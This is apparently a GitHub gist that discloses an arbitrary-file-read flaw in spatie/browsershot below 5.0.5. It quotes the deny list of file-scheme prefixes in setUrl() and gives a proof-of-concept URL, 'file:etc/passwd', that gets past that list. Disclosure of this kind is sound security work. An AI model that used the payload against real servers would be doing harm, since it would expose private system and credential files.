Skip to content

Instantly share code, notes, and snippets.

@mrdgef

mrdgef/README.md Secret

Last active December 31, 2024 14:03
Show Gist options
  • Save mrdgef/54a8783408220c67c1b859df38a52d65 to your computer and use it in GitHub Desktop.
Save mrdgef/54a8783408220c67c1b859df38a52d65 to your computer and use it in GitHub Desktop.
Download ZIP
spatie/browsershot < 5.0.5 : Improper Input Validation in Browsershot::url()
Raw
README.md

Description

The setUrl() function used by Browsershot::url() attempts to validate user input by blocking file URI schemes. An attacker can bypass this validation by omiting the slashes in file://<filename>, leading to arbitrary file read.

The affected function:

    public function setUrl(string $url): static
    {
        $url = trim($url);

        $unsupportedProtocols = [
            'file://',
            'file:/',
            'file:\\',
            'file:\\\\',
            'view-source',
        ];

        foreach ($unsupportedProtocols as $unsupportedProtocol) {
            if (str_starts_with(strtolower($url), $unsupportedProtocol)) {
                throw FileUrlNotAllowed::make();
            }
        }

Proof of Concept (PoC)

http://localhost/browsershot/example.php?url=file:etc/passwd

Output:

Impact & Severity

CIA: The vulnerability leads to arbitrary file read on a system that utilizes Browsershot. Integrity and availabiity are not affected.

Scope: The vulnerability can affect resources (the web server's file system) beyond the security scope managed by the security authority of the vulnerable component (Browsershot package).

CVSS 3.1: High - 8.6 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment